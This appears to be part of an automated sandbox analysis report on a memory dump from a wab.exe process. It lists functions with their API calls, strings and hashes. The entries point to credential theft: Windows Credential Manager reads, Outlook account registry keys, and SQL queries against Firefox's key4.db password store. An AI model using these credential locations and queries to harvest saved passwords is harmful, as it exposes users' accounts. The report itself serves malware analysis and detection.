                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: strlen.MSVCRT ref: 00406ADE
                                                                                                                                                                                                                      • Part of subcall function 00406AD1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A8D9,?,<item>), ref: 00406AEB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EBB
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403ECF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403EE3
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F04
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00403F20
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F57
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403F88
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • <table dir="rtl"><tr><td>, xrefs: 00403F1A
                                                                                                                                                                                                                    • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00403E93
                                                                                                                                                                                                                    • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00403F32
                                                                                                                                                                                                                    • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00403F82
                                                                                                                                                                                                                    • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00403EFE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memsetsprintf$FileWrite_mbscpystrlen
                                                                                                                                                                                                                    • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                                                                    • API String ID: 113626815-1670831295
                                                                                                                                                                                                                    • Opcode ID: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                    • Instruction ID: 806bb3af6c01162091129d7dbd14bcfdd9389eda619bfd821539a1a2e53cd61a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e988a86f96cb0b35651706e8a54da2f8db7d6407d8c8c481c34fbc63b9ba1f92
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 553187B2944218BAEB10EB95CC41FDF77ACEB44305F1040ABF609A3141DE789F988B69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004092CB Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 86windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 004092EC
                                                                                                                                                                                                                    • LoadMenuA.USER32(?,?), ref: 004092FA
                                                                                                                                                                                                                      • Part of subcall function 00409123: GetMenuItemCount.USER32(?), ref: 00409138
                                                                                                                                                                                                                      • Part of subcall function 00409123: memset.MSVCRT ref: 00409159
                                                                                                                                                                                                                      • Part of subcall function 00409123: GetMenuItemInfoA.USER32 ref: 00409194
                                                                                                                                                                                                                      • Part of subcall function 00409123: strchr.MSVCRT ref: 004091AB
                                                                                                                                                                                                                    • DestroyMenu.USER32(00000000), ref: 00409318
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040935C
                                                                                                                                                                                                                    • CreateDialogParamA.USER32(?,00000000,00000000,004092C6,00000000), ref: 00409371
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040938D
                                                                                                                                                                                                                    • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040939E
                                                                                                                                                                                                                    • EnumChildWindows.USER32(00000000,Function_00009213,00000000), ref: 004093C6
                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 004093CD
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                                                                                                                                                                                                    • String ID: caption$dialog_%d$menu_%d
                                                                                                                                                                                                                    • API String ID: 3259144588-3822380221
                                                                                                                                                                                                                    • Opcode ID: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                    • Instruction ID: 4880027b7f24484a0daf4b70c4ca19663393d93293db39a52c89ae2e2b3c84be
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 00d5c196fd175f8f7b493892d5fd0a4de6fbafe6eb8e7d8c787b31c60a4e7b89
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121E472500248BBEB21AF509C45EEF3768FB4A715F14007BFE01A11D2D6B85D548F59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F928 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040F798), ref: 0040F937
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0040F950
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0040F961
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0040F972
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0040F983
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0040F994
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                                                                                                                    • API String ID: 667068680-3953557276
                                                                                                                                                                                                                    • Opcode ID: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                    • Instruction ID: d70ca51da7794723d6fdd3b52e2ca510f6325bc6d96353a7ae51ff6a4d6706bc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f969084aaa60d6fc347aca6cd4b103efb280d70b1424ed757b2f63fa67c010da
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5F03674641716BEE7219B35EC41F6B2DA8B786B817150037E404F1295EBBCD406CBEE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004045D6 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00404651: FreeLibrary.KERNEL32(?,004045DE,?,0040F07D,?,00000000), ref: 00404658
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                    • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                                                                                                                                                    • API String ID: 2449869053-4258758744
                                                                                                                                                                                                                    • Opcode ID: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                    • Instruction ID: e667573ab02a3a36113e5811d7d9d25958220871e4fc9ad39742c7b975dc30ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cdcbb80234758e29e10a2fa45a01471a6c512abbbeef489e8d79757fa0f5749b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32012CB49007009ADB30AF759809B46BAE0EF9A705B224C2FE295A3691E77ED440CF49
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F177 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(0040F591,Creds,00000000,00020019,0040F591,0044FE50,00000040,?,?,0040F591,?,?,?,?), ref: 0040F1A1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040F1BF
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F1EC
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F215
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F28E
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 0040F2A1
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2AC
                                                                                                                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F2C3
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2D4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                                                                                                                                                    • String ID: Creds$ps:password
                                                                                                                                                                                                                    • API String ID: 551151806-1872227768
                                                                                                                                                                                                                    • Opcode ID: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                    • Instruction ID: 6090246ec9a09cf2b7bf1ee2c59d5b558b26d9adbf6fbfd3eb8a6f02fd62f1f0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99828ca7f35a41181d9bb96a9a02e43887c925b3765608a693f25377290640c0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7413ABA900209AFDF21DF95DC44EEFBBBCEF49704F0000B6F905E2151DA349A548B64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404217 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • wcsstr.MSVCRT ref: 0040424C
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00404293
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042A7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004042B7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004042CA
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 004042D8
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 004042EC
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040430D
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040431E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                                                                                                                                                    • String ID: %s@gmail.com$www.google.com
                                                                                                                                                                                                                    • API String ID: 3866421160-4070641962
                                                                                                                                                                                                                    • Opcode ID: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                    • Instruction ID: 638e790b5603b8fd8804fb5d4b15941c8435a10b684d18614d662d2844f21a3d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1db7f9bf2b70e86dd11ed3dbd874db975a9752dd457c4b53029e5acecafbc8af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A53195B290421CBFEB11DB91DC81FDAB36CEB44314F1005A7F708F2181DA78AF558A59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004094A2 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004094BA
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004094CA
                                                                                                                                                                                                                      • Part of subcall function 0040907D: memset.MSVCRT ref: 004090A2
                                                                                                                                                                                                                      • Part of subcall function 0040907D: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,?,00001000,00451200), ref: 004090C6
                                                                                                                                                                                                                      • Part of subcall function 0040907D: WritePrivateProfileStringA.KERNEL32(00451308,?,?,00451200), ref: 004090DD
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000004,Function_000092CB,00000000), ref: 00409500
                                                                                                                                                                                                                    • EnumResourceNamesA.KERNEL32(?,00000005,Function_000092CB,00000000), ref: 0040950A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00409512
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040952E
                                                                                                                                                                                                                    • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409542
                                                                                                                                                                                                                      • Part of subcall function 004090EB: _itoa.MSVCRT ref: 0040910C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                                                                                                                                                    • API String ID: 1035899707-3647959541
                                                                                                                                                                                                                    • Opcode ID: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                    • Instruction ID: 9dc8dfcbefe26b31ead3ecdd6c1d49ac828ce4ba7b4c08f8d1d1c72bb5e2ee9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e9d8764d44d496b522761866ccd9ae9dc7e38aa88f3c298a62bf6b22ba0dc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6112B7190025476F73127169C06FDB3E5CDF86B96F00407BBB08B61D3C6B94D40866D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004106AD Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy
                                                                                                                                                                                                                    • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                                                                                                                                    • API String ID: 714388716-318151290
                                                                                                                                                                                                                    • Opcode ID: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                    • Instruction ID: 9896847eb90bf5c4294a3c9dccddd80cbc36a64f1d49de08ffe9e6d9729d10b2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a525b84c5f9161c47f62fe334daf8b9de5718508579850184da69b323b5bb64
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CF054B1BA870D60343C0528088EAF715009463B453764627F222E05DECEEDBCD26C0F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040C750 Relevance: 18.1, APIs: 12, Instructions: 142windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 0040C7C9
                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00FF0000), ref: 0040C7D7
                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 0040C7EC
                                                                                                                                                                                                                    • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040C821
                                                                                                                                                                                                                    • SelectObject.GDI32(00000014,?), ref: 0040C82D
                                                                                                                                                                                                                      • Part of subcall function 0040C586: GetCursorPos.USER32(?), ref: 0040C593
                                                                                                                                                                                                                      • Part of subcall function 0040C586: GetSubMenu.USER32(?,00000000), ref: 0040C5A1
                                                                                                                                                                                                                      • Part of subcall function 0040C586: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040C5CE
                                                                                                                                                                                                                    • LoadCursorA.USER32(00000067), ref: 0040C84E
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040C855
                                                                                                                                                                                                                    • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040C877
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C8B2
                                                                                                                                                                                                                    • SetFocus.USER32(?), ref: 0040C92B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1416211542-0
                                                                                                                                                                                                                    • Opcode ID: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                    • Instruction ID: 09ccc7060a79f4adaf8e2edad657e89b5ff3622033c15eab8e38028839dfd0e9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72d4e56ce9792ca9f6f5468ccb6de1f9c3d453dee6bcce5964bd40597cc99410
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E518276200605EFCB15AF64CCC5AAA77A5FB08302F004636F616B72A1CB39A951DB9D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040DEF0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                                                                                                                                                    • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                                                                                                                                                    • API String ID: 2360744853-2229823034
                                                                                                                                                                                                                    • Opcode ID: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                    • Instruction ID: 5d143ff0da15214bab7bb06cf5d8f907292877c2fd7590e182fa264530f008e8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6cd9f616e22569c22ee97f1c282593b0608afcf1e5c6b77fef8cec6df374adea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 934185726053059FE724DEA5C881F9673E8EF04304F10497BF64AE3281DB78F9588B59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402C4F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 104registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402C8F
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402D91
                                                                                                                                                                                                                      • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00402CE9
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D02
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00402D40
                                                                                                                                                                                                                      • Part of subcall function 00402BC3: memset.MSVCRT ref: 00402BE3
                                                                                                                                                                                                                      • Part of subcall function 00402BC3: RegCloseKey.ADVAPI32 ref: 00402C47
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Closememset$sprintf$EnumOpen
                                                                                                                                                                                                                    • String ID: %s\%s$Identities$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Username
                                                                                                                                                                                                                    • API String ID: 1831126014-3814494228
                                                                                                                                                                                                                    • Opcode ID: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                    • Instruction ID: 1b5601e0499ef747dd56af052f35eddfd4da5329eef37c5f4f36e35d9cf9c12c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68836d752764ed395c939e698c27d7ced96b5c8b84be7de8b5e82d7aea7963ed
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0831507290011CBAEF11EA91CC46FEF777CAF04305F0404BABA04B2192E7B59F948B64
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FA44 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040FA5C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FA6A
                                                                                                                                                                                                                      • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075DD
                                                                                                                                                                                                                      • Part of subcall function 004075CB: strlen.MSVCRT ref: 004075E5
                                                                                                                                                                                                                      • Part of subcall function 004075CB: _memicmp.MSVCRT ref: 00407603
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040FABA
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FAC5
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FAA1
                                                                                                                                                                                                                      • Part of subcall function 00406EF9: GetWindowsDirectoryA.KERNEL32(004517B0,00000104,?,0040FAFA,00000000,?,00000000,00000104,00000104), ref: 00406F0E
                                                                                                                                                                                                                      • Part of subcall function 00406EF9: _mbscpy.MSVCRT ref: 00406F1E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040FAE9
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040FB04
                                                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040FB0F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                                                                                                                                                    • String ID: \systemroot
                                                                                                                                                                                                                    • API String ID: 912701516-1821301763
                                                                                                                                                                                                                    • Opcode ID: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                    • Instruction ID: 2dd3a797b17f22995e4c1cf65abf5f7fbb47152c003677c6e5f404f17f2ef451
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9693690fb4489c5de0eab49cfe3cb56840eb7b64a83fc31564cd0bab15c85152
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 92210A7550C20469F734E2618C82FEB76EC9B55708F10007FF289E14C1EEBCA9884A6A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406625 Relevance: 16.7, APIs: 7, Strings: 4, Instructions: 205COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • key4.db, xrefs: 00406632
                                                                                                                                                                                                                    • C@, xrefs: 00406625
                                                                                                                                                                                                                    • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 0040668D
                                                                                                                                                                                                                    • SELECT a11,a102 FROM nssPrivate, xrefs: 0040677A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$memcmpmemsetstrlen
                                                                                                                                                                                                                    • String ID: C@$SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                                                                                                                                                                                                    • API String ID: 2950547843-1835927508
